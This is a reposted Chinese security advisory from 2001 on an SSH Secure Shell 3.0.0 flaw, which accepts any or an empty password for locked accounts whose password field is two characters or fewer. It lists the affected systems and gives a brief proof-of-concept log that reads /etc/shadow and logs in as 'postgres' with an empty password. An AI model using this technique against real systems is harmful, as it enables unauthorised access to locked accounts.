SSH 3.0 远程登录漏洞

作者: 来源:网络文章时间:2005-12-17 23:59:02

SSH 3.0 远程登录漏洞(1)

　　发布日期: 2001-7-20

　　受影响的系统:
SSH Secure Shell 3.0.0
- Red Hat Linux 6.1
- Red Hat Linux 6.2
- Red Hat Linux 7.0
- Red Hat Linux 7.1
- Sun Solaris 2.6
- Sun Solaris 2.7
- Sun Solaris 8
- HP-UX 10.20
- HP-UX 11.00
- Caldera Linux 2.4
- Suse Linux 6.4
- Suse Linux 7.0

　　不受影响系统:
SSH Secure Shell 3.0.1
SSH Secure Shell 2.x
SSH Secure Shell 1.2.x

　　描述:

　　SSH Secure Shell 3.0.0存在一个远程安全漏洞。如果某个帐号的口令域中只包含两个或者更少的字符，远程攻击者就可以使用任何口令包括空口令登录进入这些帐号。

　　很多Unix系统有一些缺省的锁定帐号。例如Solaris,很多管理帐号"lp"，"adm","bin"等在/etc/shadow文件中的口令域为"NP"。在一些Linux系统中，一些锁定帐号的口令域为"!!"。

　　如果这些系统正在使用SSH 3.0.0，那么攻击者就可能远程登录进入系统。潜在地可能获取root权限。

　　测试程序：

　　警告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Golden_Eternity (bhodi@bigfoot.com)提供了如下测试代码：

[root@shiva /root]# cat /etc/shadow grep "postgres"
postgres:!!:11515:0:99999:7:::
[root@shiva /root]# ssh -l postgres localhost
postgres's passWord: <Null Password Entered>
Authentication sUCcessful.
Last login: Sat Jul 21 2001 09:09:21 -0700 from localhost

1.SSH 3.0 远程登录漏洞(1)
2.SSH 3.0 远程登录漏洞(2)

共2页 9 7 [1] [2] 8 :>

SSH 3.0 远程登录漏洞相关文章：

SSH 3.0 远程登录漏洞相关软件：

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
转载请注明来源：http://www.xgdown.com